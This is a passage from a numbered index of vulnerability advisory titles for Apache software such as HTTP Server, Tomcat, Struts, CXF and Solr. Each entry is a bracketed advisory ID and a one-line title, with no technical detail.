11344| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
11345| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
11346| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
11347| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
11348| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
11349| [68229] Apache Harmony PRNG Entropy Weakness
11350| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
11351| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
11352| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
11353| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
11354| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
11355| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
11356| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
11357| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
11358| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
11359| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
11360| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
11361| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
11362| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
11363| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
11364| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
11365| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
11366| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
11367| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
11368| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
11369| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
11370| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
11371| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
11372| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
11373| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
11374| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
11375| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
11376| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
11377| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
11378| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
11379| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
11380| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
11381| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
11382| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
11383| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
11384| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
11385| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
11386| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
11387| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
11388| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
11389| [64780] Apache CloudStack Unauthorized Access Vulnerability
11390| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
11391| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
11392| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
11393| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
11394| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
11395| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
11396| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
11397| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
11398| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
11399| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
11400| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
11401| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
11402| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
11403| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
11404| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
11405| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
11406| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
11407| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
11408| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
11409| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
11410| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
11411| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
11412| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
11413| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
11414| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
11415| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
11416| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
11417| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
11418| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
11419| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
11420| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
11421| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
11422| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
11423| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
11424| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
11425| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
11426| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
11427| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
11428| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
11429| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
11430| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
11431| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
11432| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
11433| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
11434| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
11435| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
11436| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
11437| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
11438| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
11439| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
11440| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
11441| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
11442| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
11443| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
11444| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
11445| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
11446| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
11447| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
11448| [59670] Apache VCL Multiple Input Validation Vulnerabilities
11449| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
11450| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
11451| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
11452| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
11453| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
11454| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
11455| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
11456| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
11457| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
11458| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
11459| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
11460| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
11461| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
11462| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
11463| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
11464| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
11465| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
11466| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
11467| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
11468| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
11469| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
11470| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
11471| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
11472| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
11473| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
11474| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
11475| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
11476| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
11477| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
11478| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
11479| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
11480| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
11481| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
11482| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
11483| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
11484| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
11485| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
11486| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
11487| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
11488| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
11489| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
11490| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
11491| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
11492| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
11493| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
11494| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
11495| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
11496| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
11497| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
11498| [54798] Apache Libcloud Man In The Middle Vulnerability
11499| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
11500| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
11501| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
11502| [54189] Apache Roller Cross Site Request Forgery Vulnerability
11503| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
11504| [53880] Apache CXF Child Policies Security Bypass Vulnerability
11505| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
11506| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
11507| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
11508| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
11509| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
11510| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
11511| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
11512| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
11513| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
11514| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
11515| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
11516| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
11517| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
11518| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
11519| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
11520| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
11521| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
11522| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
11523| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
11524| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
11525| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
11526| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
11527| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
11528| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
11529| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
11530| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
11531| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
11532| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
11533| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
11534| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
11535| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
11536| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
11537| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
11538| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
11539| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
11540| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
11541| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
11542| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
11543| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
11544| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
11545| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
11546| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
11547| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
11548| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
11549| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
11550| [49290] Apache Wicket Cross Site Scripting Vulnerability
11551| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
11552| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
11553| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
11554| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
11555| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
11556| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
11557| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
11558| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
11559| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
11560| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
11561| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
11562| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
11563| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
11564| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
11565| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
11566| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
11567| [46953] Apache MPM-ITK Module Security Weakness
11568| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
11569| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
11570| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
11571| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
11572| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
11573| [46166] Apache Tomcat JVM Denial of Service Vulnerability
11574| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
11575| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
11576| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
11577| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
11578| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
11579| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
11580| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
11581| [44616] Apache Shiro Directory Traversal Vulnerability
11582| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
11583| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
11584| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
11585| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
11586| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
11587| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
11588| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
11589| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
11590| [42492] Apache CXF XML DTD Processing Security Vulnerability
11591| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
11592| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
11593| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
11594| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
11595| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
11596| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
11597| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
11598| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
11599| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
11600| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
11601| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
11602| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
11603| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
11604| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
11605| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
11606| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
11607| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
11608| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
11609| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
11610| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
11611| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
11612| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
11613| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
11614| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
11615| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
11616| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
11617| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
11618| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
11619| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
11620| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
11621| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
11622| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
11623| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
11624| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
11625| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
11626| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
11627| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
11628| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
11629| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
11630| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
11631| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
11632| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
11633| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
11634| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
11635| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
11636| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
11637| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
11638| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
11639| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
11640| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
11641| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
11642| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
11643| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
11644| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
11645| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
11646| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
11647| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
11648| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
11649| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
11650| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
11651| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
11652| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
11653| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
11654| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
11655| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
11656| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
11657| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
11658| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
11659| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
11660| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
11661| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
11662| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
11663| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
11664| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
11665| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
11666| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
11667| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
11668| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
11669| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
11670| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
11671| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
11672| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
11673| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
11674| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
11675| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
11676| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
11677| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
11678| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
11679| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
11680| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
11681| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
11682| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
11683| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
11684| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
11685| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
11686| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
11687| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
11688| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
11689| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
11690| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
11691| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
11692| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
11693| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
11694| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
11695| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
11696| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
11697| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
11698| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
11699| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
11700| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
11701| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
11702| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
11703| [20527] Apache Mod_TCL Remote Format String Vulnerability
11704| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
11705| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
11706| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
11707| [19106] Apache Tomcat Information Disclosure Vulnerability
11708| [18138] Apache James SMTP Denial Of Service Vulnerability
11709| [17342] Apache Struts Multiple Remote Vulnerabilities
11710| [17095] Apache Log4Net Denial Of Service Vulnerability
11711| [16916] Apache mod_python FileSession Code Execution Vulnerability
11712| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
11713| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
11714| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
11715| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
